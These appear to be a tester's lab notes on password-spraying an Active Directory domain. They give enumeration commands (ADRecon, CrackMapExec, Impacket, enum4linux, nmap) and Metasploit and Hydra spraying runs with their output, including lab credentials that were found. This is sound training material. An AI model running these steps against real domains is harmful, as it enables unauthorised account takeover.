The objective of a password spraying attack is to attempt to access a large number of accounts (usernames) with a few commonly used passwords 
(e.g. login=password, P@ssw0rd, Welcome1, month+date such as "Jan2020!" or "Jan@2020").


Step 1 - Windows account enumeration
================================================================================================================

=> ADrecon.ps1
-------------------------------------
PS C:\Users\Administrator.PO718687\Documents\ADRecon-master> .\ADRecon.ps1 -Method ADWS -DomainController 192.168.1.50 -Credential Security-Test-Lab\Qualys -Collect default,ACLs,Kerberoast

=> CrackMapExec
-------------------------------------
jeff@kali:~/Documents/CTFs/BadBlood$ crackmapexec smb 192.168.1.50 -u backup -p Test1234 --users

=> Impacket script "GetADUsers.py"
-------------------------------------
jeff@kali:~/Documents/CTFs/BadBlood$ GetADUsers.py -all -dc-ip 192.168.1.50 security-test-lab.local/backup


=> Enum4Linux
-------------------------------------
enum4linux -u Webserver-adm-svc -p Webserver-adm-svc -a 192.168.1.50 > enum4linux-Webserver-adm-svc.txt


=> NMAP
-------------------------------------
jeff@kali:~$ sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm="security-test-lab.local" 192.168.1.50
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 06:01 CEST
Nmap scan report for 192.168.1.50
Host is up (0.00057s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|_    administrator@security-test-lab.local
MAC Address: 08:00:27:CC:ED:6B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

Other
-------------------------------------
Tools such as "theharvester" to scan the Internet looking for names, email, usernames amoung many other information..



Step 2 - Basic Windows password spray attacks
================================================================================================================

=> Metasploit module "smb_login"
==================================

Option 1 - Use a dictionnary file containing users and passwords separated by space, one pair per line
----------------------------------------------------------------------------------------------------------------

msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting                                                                       Required  Description
   ----               ---------------                                                                       --------  -----------
   ABORT_ON_LOCKOUT   false                                                                                 yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false                                                                                 no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                                                                                     yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false                                                                                 no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false                                                                                 no        Add all passwords in the current database to the list
   DB_ALL_USERS       false                                                                                 no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false                                                                                 no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false                                                                                 no        Detect if domain is required for the specified user
   PASS_FILE                                                                                                no        File containing passwords, one per line
   PRESERVE_DOMAINS   true                                                                                  no        Respect a username that contains a domain name.
   Proxies                                                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false                                                                                 no        Record guest-privileged random logins to the database
   RHOSTS             192.168.1.50                                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445                                                                                   yes       The SMB service port (TCP)
   SMBDomain          Security-Test-Lab                                                                     no        The Windows domain to use for authentication
   SMBPass                                                                                            	    no        The password for the specified username
   SMBUser                                                                                                  no        The username to authenticate as
   STOP_ON_SUCCESS    false                                                                                 yes       Stop guessing when a credential works for a host
   THREADS            1                                                                                     yes       The number of concurrent threads (max one per host)
   USERPASS_FILE      /home/jeff/Documents/CTFs/BadBlood/Credentials & Info dump/Password-spraying-all.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false                                                                                 no        Try the username as the password for all users
   USER_FILE                                                                                                no        File containing usernames, one per line
   VERBOSE            false                                                                                 yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > run

[+] 192.168.1.50:445      - 192.168.1.50:445 - Success: 'Security-Test-Lab\backup:P@sswOrd' Administrator
[*] 192.168.1.50:445      - 192.168.1.50:445 - Correct credentials, but unable to login: 'Security-Test-Lab\EVA_KEY:EVA_KEY',
[*] 192.168.1.50:445      - 192.168.1.50:445 - Correct credentials, but unable to login: 'Security-Test-Lab\HECTOR_BRADY:Welcome1',
[*] 192.168.1.50:445      - 192.168.1.50:445 - Correct credentials, but unable to login: 'Security-Test-Lab\JEAN_MOON:12345678',
[+] 192.168.1.50:445      - 192.168.1.50:445 - Success: 'Security-Test-Lab\Webserver-adm-svc:Webserver-adm-svc'
[*] 192.168.1.50:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) > 



Option 2 - Try the username as the password for all users
------------------------------------------------------------

msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting                                                                  Required  Description
   ----               ---------------                                                                  --------  -----------
   ABORT_ON_LOCKOUT   false                                                                            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false                                                                            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                                                                                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false                                                                            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false                                                                            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false                                                                            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false                                                                            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false                                                                            no        Detect if domain is required for the specified user
   PASS_FILE                                                                                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true                                                                             no        Respect a username that contains a domain name.
   Proxies                                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false                                                                            no        Record guest-privileged random logins to the database
   RHOSTS             192.168.1.50                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445                                                                              yes       The SMB service port (TCP)
   SMBDomain          Security-Test-Lab                                                                no        The Windows domain to use for authentication
   SMBPass                                                                                             no        The password for the specified username
   SMBUser                                                                                             no        The username to authenticate as
   STOP_ON_SUCCESS    false                                                                            yes       Stop guessing when a credential works for a host
   THREADS            1                                                                                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                                                                                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       true                                                                             no        Try the username as the password for all users
   USER_FILE          /home/jeff/Documents/CTFs/BadBlood/Credentials & Info dump/Domain-users-all.txt  no        File containing usernames, one per line
   VERBOSE            true                                                                             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > run

<SNIP>
[-] 192.168.1.50:445      - 192.168.1.50:445 - Failed: 'Security-Test-Lab\WARD_BYRD:WARD_BYRD',
[-] 192.168.1.50:445      - 192.168.1.50:445 - Failed: 'Security-Test-Lab\WARD_CRAIG:WARD_CRAIG',
[-] 192.168.1.50:445      - 192.168.1.50:445 - Failed: 'Security-Test-Lab\WAYNE_MORALES:WAYNE_MORALES',
[+] 192.168.1.50:445      - 192.168.1.50:445 - Success: 'Security-Test-Lab\Webserver-adm-svc:Webserver-adm-svc'
<SNIP>


=> HYDRA /xHYDRA
==============================================
jeff@kali:~/Documents/CTFs/BadBlood$ xhydra

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-28 12:17:32
[DATA] max 1 task per 1 server, overall 1 task, 958 login tries (l:479/p:2), ~958 tries per task
[DATA] attacking smb://192.168.1.50:445/Both
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)

[445][smb] host: 192.168.1.50   login: EVA_KEY   password: EVA_KEY

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-28 12:17:43
<finished>
